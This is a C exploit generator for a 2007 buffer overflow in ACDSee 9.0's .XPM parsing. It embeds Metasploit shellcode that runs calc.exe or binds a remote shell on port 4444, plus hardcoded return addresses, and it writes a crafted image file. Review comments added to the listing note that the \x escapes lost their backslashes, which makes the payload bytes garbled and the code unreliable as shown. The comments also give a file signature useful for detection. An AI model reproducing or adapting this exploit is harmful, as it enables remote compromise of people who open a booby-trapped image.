# Title : ACDSee 9.0 (.XPM File) Local Buffer Overflow Exploit
# Published : 2007-04-22
# Author : Marsu
/*****************************************************************************
* ACDSee v9.0 .XPM File Buffer Overflow *
* *
* *
* ACDSee is vulnerable to an unspecified buffer overflow when processing a *
* crafted .XPM file. *
* This exploit runs calc.exe or binds a shell to port 4444, and works against *
* ACDSee and ACDSee Quick View. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr> *
*****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
/* Payload bytes for mode 0 (see the generator comment above).
 * NOTE(review): in this copy of the listing the `\x` escape sequences have
 * lost their backslashes, so as written this is a plain ASCII string of
 * hex digits, not the 164-byte binary payload the comment describes.
 * main() measures it with strlen(), so an embedded NUL would truncate it. */
unsigned char CalcShellcode[] =
"x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x98"
"x11xbexa7x83xebxfcxe2xf4x64xf9xfaxa7x98x11x35xe2"
"xa4x9axc2xa2xe0x10x51x2cxd7x09x35xf8xb8x10x55xee"
"x13x25x35xa6x76x20x7ex3ex34x95x7exd3x9fxd0x74xaa"
"x99xd3x55x53xa3x45x9axa3xedxf4x35xf8xbcx10x55xc1"
"x13x1dxf5x2cxc7x0dxbfx4cx13x0dx35xa6x73x98xe2x83"
"x9cxd2x8fx67xfcx9axfex97x1dxd1xc6xabx13x51xb2x2c"
"xe8x0dx13x2cxf0x19x55xaex13x91x0exa7x98x11x35xcf"
"xa4x4ex8fx51xf8x47x37x5fx1bxd1xc5xf7xf0x6fx66x45"
"xebx79x26x59x12x1fxe9x58x7fx72xdfxcbxfbx3fxdbxdf"
"xfdx11xbexa7";
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
/* Payload bytes for mode 1 (see the generator comment above).
 * NOTE(review): same rendering issue as CalcShellcode — the `\x` escapes have
 * lost their backslashes in this copy, so this literal is ASCII text rather
 * than the 344-byte binary payload the comment describes. Also measured with
 * strlen() in main(). */
unsigned char BindShellcode[] =
"x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x5c"
"x7bx78x7fx83xebxfcxe2xf4xa0x11x93x32xb4x82x87x80"
"xa3x1bxf3x13x78x5fxf3x3ax60xf0x04x7ax24x7ax97xf4"
"x13x63xf3x20x7cx7ax93x36xd7x4fxf3x7exb2x4axb8xe6"
"xf0xffxb8x0bx5bxbaxb2x72x5dxb9x93x8bx67x2fx5cx57"
"x29x9exf3x20x78x7ax93x19xd7x77x33xf4x03x67x79x94"
"x5fx57xf3xf6x30x5fx64x1ex9fx4axa3x1bxd7x38x48xf4"
"x1cx77xf3x0fx40xd6xf3x3fx54x25x10xf1x12x75x94x2f"
"xa3xadx1ex2cx3ax13x4bx4dx34x0cx0bx4dx03x2fx87xaf"
"x34xb0x95x83x67x2bx87xa9x03xf2x9dx19xddx96x70x7d"
"x09x11x7ax80x8cx13xa1x76xa9xd6x2fx80x8ax28x2bx2c"
"x0fx28x3bx2cx1fx28x87xafx3ax13x69x23x3ax28xf1x9e"
"xc9x13xdcx65x2cxbcx2fx80x8ax11x68x2ex09x84xa8x17"
"xf8xd6x56x96x0bx84xaex2cx09x84xa8x17xb9x32xfex36"
"x0bx84xaex2fx08x2fx2dx80x8cxe8x10x98x25xbdx01x28"
"xa3xadx2dx80x8cx1dx12x1bx3ax13x1bx12xd5x9ex12x2f"
"x05x52xb4xf6xbbx11x3cxf6xbex4axb8x8cxf6x85x3ax52"
"xa2x39x54xecxd1x01x40xd4xf7xd0x10x0dxa2xc8x6ex80"
"x29x3fx87xa9x07x2cx2ax2ex0dx2ax12x7ex0dx2ax2dx2e"
"xa3xabx10xd2x85x7exb6x2cxa3xadx12x80xa3x4cx87xaf"
"xd7x2cx84xfcx98x1fx87xa9x0ex84xa8x17xacxf1x7cx20"
"x0fx84xaex80x8cx7bx78x7f";
/* Leading bytes of the generated file. Decoding the hex values gives a
 * standard XPM preamble with CRLF line endings:
 *   "/* XPM *\/\r\nstatic char *Pixmap[] = {\r\n\"509 438 256 3\",\r\n\""
 * i.e. a 509x438 image declaring 256 colours with 3 chars per pixel, then the
 * opening quote of the first data row. The fixed "509 438 256 3" header line
 * is the most stable signature of files produced by this generator.
 * NOTE(review): as with the payload arrays, the `\x` backslashes are missing
 * in this copy, so the literal is ASCII hex text rather than these bytes.
 * main() copies sizeof(XPMHeaders)-1 bytes, dropping the terminating NUL. */
char XPMHeaders[]=
"x2fx2ax20x58x50x4dx20x2ax2fx0dx0ax73x74x61x74x69"
"x63x20x63x68x61x72x20x2ax50x69x78x6dx61x70x5bx5d"
"x20x3dx20x7bx0dx0ax22x35x30x39x20x34x33x38x20x32"
"x35x36x20x33x22x2cx0dx0a x22";
/* Entry point: writes a 6600-byte file named by argv[2].
 * Layout (all offsets into evilbuff): the XPMHeaders preamble at 0, 'A'
 * filler everywhere not otherwise written, a 4-byte value at 0x1040, a
 * 12-byte value at 0x10a4, the selected payload at 0x11a0, and a 7-byte
 * closing sequence at 0x1916. argv[1] selects the payload via atoi():
 * 0 (or any non-numeric string, since atoi() returns 0) -> CalcShellcode,
 * anything else -> BindShellcode.
 * Returns 0 on every path, including the usage and fopen() failure paths, so
 * callers cannot distinguish success from failure by exit status.
 *
 * Review notes on the code as written:
 *  - memset(), memcpy() and strlen() are used without #include <string.h>
 *    (only "stdio.h"/"stdlib.h" are included); implicit declarations were
 *    removed in C99 and this will not compile with a modern compiler.
 *  - strlen() is passed an unsigned char array; the parameter type is
 *    const char *, which is a pointer-type mismatch.
 *  - The "\x" and "\n" escapes in the string literals below have lost their
 *    backslashes in this copy (e.g. "Overflown" rather than a newline), so the
 *    listing does not reproduce the bytes the comments describe.
 *  - fwrite() and fclose() return values are not checked; a short or failed
 *    write is reported as "Done". */
int main(int argc, char* argv[])
{
FILE* xpmfile;
char evilbuff[6600];
int offset=0; /* unused */
printf("[+] ACDSee v9.0 .XPM File Buffer Overflown");
printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>n");
if (argc!=3) {
printf("[+] Usage: %s Mode <file.xpm>n",argv[0]);
printf("[+] Mode is 0 -> run calc.exen");
printf("[+] 1 -> bind shell to port 4444n");
return 0;
}
/* Fill the whole buffer first; later memcpy()s overwrite fixed regions. */
memset(evilbuff,'A',6600);
/* sizeof-1 drops the NUL terminator of the header literal. */
memcpy(evilbuff,XPMHeaders,sizeof(XPMHeaders)-1);
memcpy(evilbuff+0x1040,"x05x03x81x7C",4); //call ebx in kernel32. This one is for ACDsee9.exe
memcpy(evilbuff+0x10a4,"x90x90xebx16x2ax02xfcx7fx2ax02xfcx7f",12); //pop pop ret in ???. Works for ACDsee9.exe and ACDSeeQV.exe
/* Payload length comes from strlen(), so the copy stops at the first NUL. */
if (!atoi(argv[1]))
memcpy(evilbuff+0x11a0,CalcShellcode,strlen(CalcShellcode));
else
memcpy(evilbuff+0x11a0,BindShellcode,strlen(BindShellcode));
//End of XPM file
memcpy(evilbuff+0x1916,"x22x0dx0ax29x3bx0dx0a",7);
/* "wb": written as binary so the buffer bytes are not translated. */
if ((xpmfile=fopen(argv[2],"wb"))==0) {
printf("[-] Unable to access file.n");
return 0;
}
/* Return value ignored: a short write goes unnoticed. */
fwrite( evilbuff, 1, 6600, xpmfile );
fclose(xpmfile);
printf("[+] Done. Have fun!n");
return 0;
}